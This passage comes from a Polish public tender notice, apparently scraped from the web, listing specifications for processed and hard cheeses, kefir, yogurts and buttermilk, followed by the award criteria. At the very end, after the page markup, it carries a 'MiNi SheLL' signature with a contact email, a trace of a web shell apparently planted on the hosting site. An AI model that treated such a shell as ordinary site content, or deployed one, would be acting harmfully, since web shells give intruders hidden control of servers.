topiony naturalny kremowy; barwa naturalna; smak i zapach: charakterystyczny dla odpowiedniego sera naturalnego z którego wyprodukowano ser topiony, ze swoistym posmakiem topienia, w kształcie trójkąta o masie ok. 25 g, w opakowaniu ok. 200 g; dozwolone dodatki smakowe: papryka, czosnek, szynka, borowik, itp.: zawartość tłuszczu w suchej masie nie mniej niż 27%. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy. kg	5014	Ser topiony- prostokąt	15542200-1	Ser topiony naturalny kremowy; barwa naturalna; smak i zapach: charakterystyczny dla odpowiedniego sera naturalnego klasy z którego wyprodukowano ser topiony, ze swoistym posmakiem topienia, w kształcie prostokąta o masie ok. 100-150 g., dozwolone dodatki smakowe: papryka, czosnek, szynka, borowik, itp.: zawartość tłuszczu w suchej masie nie mniej niż 27%. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy. kg	6015	Ser topiony - plastry	15542200-1	Ser topiony naturalny kremowy; barwa naturalna; smak i zapach: charakterystyczny dla odpowiedniego sera naturalnego z którego wyprodukowano ser topiony, ze swoistym posmakiem topienia, dozwolone dodatki smakowe: papryka, czosnek, szynka, borowik, itp. Pakowane po 8 plastrów, oddzielnie każdy, w opakowaniu ok. 130-150 g, całość pakowana próżniowo. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy.	kg	5016	Ser typu feta lub równoważny.	15542300-2	Ser typu feta, sałatkowo - kanapkowy. Serek miękki solankowy, pełnotłusty, z mleka pasteryzowanego, nie mniej niż 12% tłuszczu w suchej masie. Opakowanie jednostkowe ok. 260-280g : pudełko kartonowe z laminatu wielowarstwowego. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy.	kg	3017	Ser żółty typu gouda lub równoważny.	15544000-3	Blok, o bokach lekko wypukłych i zaokrąglonych, szerokość ok. 10 , długość ok. 25 cm, o barwie jasnożółtej, smak i zapach delikatny, łagodny, miąższ w miarę miękki, elastyczny, jednolity w całej masie, zawartość tłuszczu w suchej masie nie mniej niż 45%, pakowany w folię termokurczliwą, o terminie przydatności do spożycia do 60 dni od daty produkcji. kg	24018	Ser żółty z przyprawami pełnotłusty	15544000-3	Kształt: walec o wymiarach: średnica ok. 8 cm, długość ok. 25 cm. Ser pełnotłusty , możliwy wsad: zioła, papryka, szynka; smak i zapach łagodny, aromatyczny, właściwy dla dodatku; konsystencja twarda-nadający się do krojenia, pakowany w folię termokurczliwą, zawartość tłuszczu w suchej masie nie mniej niż 45%. Termin przydatności do spożycia nie krótszy niż 60 dni od daty dostawy. kg	24019	Ser żółty typu salami lub równoważny. 15544000-3	Kształt: walec o wymiarach: średnica ok. 8 cm, długość ok. 25 cm, barwa żółta, jednolita w całej masie; smak i zapach: łagodny, aromatyczny, lekko kwaśny, lekko pikantny; konsystencja: miąższ elastyczny, jednolity w całej masie, oczka okrągłe lub owalne wielkości ziarna ryżu lub małego grochu; zawartość tłuszczu w suchej masie nie mniej niż 45%; pakowany w folię termokurczliwą. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy.	kg	24020	Ser żółty wędzony typu rolada ustrzycka lub równoważny. 15544000-3	Walec o średnicy ok. 7 cm, długości ok.25 cm. Zawartość tłuszczu nie mniej niż 45% w suchej masie; pakowany próżniowo; widoczne ślady od siatki. Wędzony w sposób naturalny. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy. kg	24021	Ser żółty wędzony	15544000-3	W bloku o długości ok. 30 cm i wysokości minimum 8 cm. Ser tłusty, wędzony, podpuszczkowy, dojrzewający o zawartość tłuszczu ok. 25%. Opakowanie z folii termokurczliwej. Termin przydatności do spożycia: nie krótszy niż 60 dni od daty dostawy.	kg	24022	Kefir	15551000-5 Płyn jednolity w całej masie; barwa biała z odcieniem kremowym; konsystencja jednolita; smak i zapach: lekko kwaśny do kwaśnego, orzeźwiający, charakterystyczny dla kefiru; zawartość tłuszczu nie mniej niż 2%; opakowanie jednostkowe: kubki z folii polistyrenowej, zamykane przykrywką z folii aluminiowej o pojemności ok. 400-500 g. Termin przydatności do spożycia: nie krótszy niż 10 dni od daty dostawy.	kg	2023	Jogurt naturalny	15551310-1	Jogurt naturalny bez cukru. Opakowanie jednostkowe - kubek z tworzywa sztucznego, poj. ok. 400-500g. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	21024	Jogurt owocowy	15551320-4 Konsystencja jednolita, kremowa bez grudek, lekko luźna z widocznymi kawałkami owoców użytych do produkcji, wsad owoców od ok. 2,5 - 4,5 %; barwa naturalna charakterystyczna dla użytych owoców ; smak i zapach: czysty, łagodny, słodko - kwaśny, smakowo właściwy dla owoców będących składnikiem jogurtu. Zawartość tłuszczu w suche masie nie mniej niż 1,5% - 2,5%. Różne smaki owocowe, poj. ok.100-150g. Opakowanie jednostkowe- kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	12025	Jogurt owocowy pitny	15551320-4 Konsystencja jednolita, kremowa bez grudek, pitna bez widocznych kawałków owoców użytych do produkcji, wsad owoców od ok. 2,5 - 4,5 %; barwa naturalna charakterystyczna dla użytych owoców ; smak i zapach: czysty, łagodny, słodko - kwaśny, smakowo właściwy dla owoców będących składnikiem jogurtu. Zawartość tłuszczu w suche masie nie mniej niż 1,5% - 2,5%. Różne smaki owocowe, poj. ok.300-310 ml. Opakowanie jednostkowe- kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	l	12026	Maślanka	15551500-0	Konsystencja płynna, jednolita w całej masie bez grudek tłuszczu; barwa jednolita biała do lekko kremowej; smak i zapach: lekko kwaśny, aromatyczny, orzeźwiający, bez obcych posmaków; zawartość tłuszczu nie mniej niż 1,5%; opakowanie jednostkowe: butelka pcv/pudełko kartonowe z laminatu wielowarstwowego o poj. 1 l. Termin przydatności do spożycia: nie krótszy niż 10 dni od daty dostawy.	l	50<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15500000-3, 15431100-9, 15511210-8, 15512000-0, 15530000-2, 15542100-0, 15542200-1, 15542300-2, 15544000-3, 15551500-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-03-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najktótszy czas wymiany wadliwego towaru</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com